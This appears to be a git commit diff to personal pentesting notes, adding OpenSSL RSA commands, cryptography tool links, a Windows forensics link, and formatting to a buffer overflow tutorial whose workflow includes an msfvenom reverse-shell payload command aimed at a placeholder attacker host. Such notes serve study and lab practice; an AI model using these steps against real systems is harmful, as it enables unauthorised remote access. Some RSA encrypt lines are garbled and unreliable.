added cheat sheet to windows forensics
This commit is contained in:
parent
24937f7d68
commit
9e466f8d43
|
@ -21,3 +21,24 @@ openssl pkcs12 -export -out *.pfx -in temp.pem
|
||||||
```sh
|
```sh
|
||||||
openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes
|
openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes
|
||||||
```
|
```
|
||||||
|
## RSA
|
||||||
|
|
||||||
|
### Decrypt RSA
|
||||||
|
|
||||||
|
* Decrypt a RSA cipher with the private key
|
||||||
|
```sh
|
||||||
|
openssl pkeyutl -decrypt -in $CIPHER -out $CLEAR_TEXT -inkey $PRIVATE_KEY
|
||||||
|
```
|
||||||
|
|
||||||
|
* Deprecated version of RSA decryption is the following
|
||||||
|
```sh
|
||||||
|
openssl rsautl -decrypt -in $CIPHER -out $CLEAR_TEXT -inkey $PRIVATE_KEY
|
||||||
|
```
|
||||||
|
|
||||||
|
### Encrypt RSA
|
||||||
|
|
||||||
|
* Encrypt RSA current and deprecated
|
||||||
|
```sh
|
||||||
|
openssl pkeyutl -encrypt -in $CLEAR_TEXT -out $CLEAR_TEXT -pubin -inkey $PRIVATE_KEY
|
||||||
|
openssl rsautl -encrypt -in $CLEAR_TEXT -out $ENCRYPTED -pubin -inkey $PRIVATE_KEY
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,6 @@
|
||||||
|
# Cryptography References
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [RsaCtfTool](https://github.com/RsaCtfTool/RsaCtfTool.git)
|
||||||
|
* [featherduster](https://github.com/nccgroup/featherduster.git)
|
|
@ -1,13 +1,16 @@
|
||||||
# Buffer Overflow
|
# Buffer Overflow
|
||||||
|
|
||||||
* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
|
* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
|
||||||
|
|
||||||
# Usage
|
# Usage
|
||||||
|
|
||||||
* Fuzz & crash the binary pretty roughly via payload
|
* Fuzz & crash the binary pretty roughly via payload
|
||||||
```sh
|
```sh
|
||||||
python -c "print('A' * 3000)
|
python -c "print('A' * 3000)
|
||||||
```
|
```
|
||||||
|
|
||||||
## Fuzzing
|
## Fuzzing
|
||||||
|
|
||||||
* python 3
|
* python 3
|
||||||
../fuzzer.py
|
../fuzzer.py
|
||||||
|
|
||||||
|
@ -15,18 +18,33 @@ python -c "print('A' * 3000)
|
||||||
../fuzzer2.py
|
../fuzzer2.py
|
||||||
|
|
||||||
## Measure Offset
|
## Measure Offset
|
||||||
|
|
||||||
|
### Metasploit
|
||||||
* Use as payload
|
* Use as payload
|
||||||
```sh
|
```sh
|
||||||
/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>
|
/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>
|
||||||
```
|
```
|
||||||
|
|
||||||
* Find content of the payload at EIP and identify exact bufferlength
|
* Find content of the payload at EIP and identify exact bufferlength
|
||||||
```sh
|
```sh
|
||||||
/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>
|
/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Gef
|
||||||
|
|
||||||
|
```sh
|
||||||
|
file <filename>
|
||||||
|
pattern create
|
||||||
|
pattern search <Pattern found in $rbx>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Infinity Debugger
|
||||||
|
|
||||||
|
```sh
|
||||||
msf-pattern_offset -l <bufferlength> -q <EIP>
|
msf-pattern_offset -l <bufferlength> -q <EIP>
|
||||||
```
|
```
|
||||||
```
|
|
||||||
|
```sh
|
||||||
mona msfpattern -l <bufferlength>
|
mona msfpattern -l <bufferlength>
|
||||||
```
|
```
|
||||||
* Fill offset variable in exploit `buffer_overflow.py`
|
* Fill offset variable in exploit `buffer_overflow.py`
|
||||||
|
@ -35,6 +53,7 @@ mona msfpattern -l <bufferlength>
|
||||||
* Execute buffer_overflow.py, EIP should contain `BBBB`
|
* Execute buffer_overflow.py, EIP should contain `BBBB`
|
||||||
|
|
||||||
## Find bad characters to input in the buffer
|
## Find bad characters to input in the buffer
|
||||||
|
|
||||||
* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`.
|
* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`.
|
||||||
../bad_chars.py
|
../bad_chars.py
|
||||||
|
|
||||||
|
@ -45,9 +64,11 @@ mona msfpattern -l <bufferlength>
|
||||||
```
|
```
|
||||||
|
|
||||||
## Find Jump Point / RoP
|
## Find Jump Point / RoP
|
||||||
|
|
||||||
* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP`
|
* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP`
|
||||||
|
|
||||||
### Example: Immunity Debugger using mona on windows machine
|
### Example: Immunity Debugger using mona on windows machine
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
!mona modules
|
!mona modules
|
||||||
```
|
```
|
||||||
|
@ -57,6 +78,7 @@ mona msfpattern -l <bufferlength>
|
||||||
* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64
|
* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64
|
||||||
|
|
||||||
## Shellcode as Payload
|
## Shellcode as Payload
|
||||||
|
|
||||||
* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py`
|
* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py`
|
||||||
```sh
|
```sh
|
||||||
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
|
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
|
||||||
|
|
|
@ -18,6 +18,11 @@
|
||||||
|
|
||||||
* [ropstar](https://github.com/xct/ropstar.git)
|
* [ropstar](https://github.com/xct/ropstar.git)
|
||||||
|
|
||||||
|
## Cryptography
|
||||||
|
|
||||||
|
* [RsaCtfTool](https://github.com/RsaCtfTool/RsaCtfTool.git)
|
||||||
|
* [featherduster](https://github.com/nccgroup/featherduster.git)
|
||||||
|
|
||||||
## Windows
|
## Windows
|
||||||
|
|
||||||
* [crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec.git)
|
* [crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec.git)
|
||||||
|
|
|
@ -1,11 +1,13 @@
|
||||||
# Windows Registry
|
# Windows Registry
|
||||||
|
|
||||||
|
* [Windows Forensics Cheat Sheet](https://user-images.githubusercontent.com/58165365/157232143-3c8785ec-164b-4843-bde8-9d9a22350159.png)
|
||||||
|
|
||||||
## Regedit Keys
|
## Regedit Keys
|
||||||
* HKEY_CURRENT_USER (HKCU), inside HKU
|
* HKEY_CURRENT_USER (HKCU), inside HKU
|
||||||
* HKEY_USERS (HKU)
|
* HKEY_USERS (HKU)
|
||||||
* HKEY_LOCAL_MACHINE (HKLM)
|
* HKEY_LOCAL_MACHINE (HKLM)
|
||||||
* HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU
|
* HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU
|
||||||
* `HKEY_CURREN_USER\Software\Classes` for settings of interactive user
|
* `HKEY_CURRENT_USER\Software\Classes` for settings of interactive user
|
||||||
* `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings
|
* `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings
|
||||||
* HKEY_CURRENT_CONFIG
|
* HKEY_CURRENT_CONFIG
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue